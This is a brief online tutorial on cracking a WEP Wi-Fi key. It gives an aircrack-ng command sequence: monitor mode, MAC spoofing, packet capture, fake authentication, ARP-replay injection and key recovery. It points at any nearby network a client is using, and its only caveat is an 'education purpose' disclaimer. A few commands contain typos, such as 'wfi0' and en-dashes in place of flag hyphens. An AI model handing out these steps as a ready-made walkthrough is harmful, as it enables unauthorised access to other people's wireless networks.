WEP crack - This is only for Education purpose.

This article will explain how to crack wep key

Please find below details

Type the following command
-- airmon-ng

Note down the interface name. In this example wifi0

-- airmon-ng stop wifi0

--ifconfig wifi0 down

--macchanger --mac 00:11:22:33:44:55 wifi0

-- airmon-ng start wifi0

-- airodump-ng wifi0

This will start populating Wifi networks. Press Ctrl + C to stop.Check the network with WEP encryption. Notedown BSSID, CH and ESSID somewhere in notepad or paper Note that if the same BSSID is available in the second part with STATION associated with it, it means yousome one is accessing that network and our task will be little easier. If not than don’t worry we will still crack it.

Now Below steps

-- airodump-ng -c (channel) -w (file name) --bssid (bssid) wifi0
Replace
(channel) with the CH which u had already note
(file name) with any name of your choice
(bssid) with the BSSID which u had already note
Leave this console as it is and start new console

-- aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wifi0

If you don’t get Association Successful message than keep on trying until you get success

-- aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wifi0

Well if you don’t see ARP ACK and sent packets are not increasing or still 0 than it means no 1 is accessing that network.But don’t worry you got an optional stepLeave this console as it is and start new console.

-- aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b (bssid) –h 00:11:22:33:44:55 wfi0

Press y and enter
Now you will see that ARP and ACK packets in 2nd console are increasing fast
Keep this console as it is and start 4th console

-- aircrack-ng -b (bssid) (filename)-01.cap

Just wait and watch…..OS will do rest of the work.

This is only for Education purpose.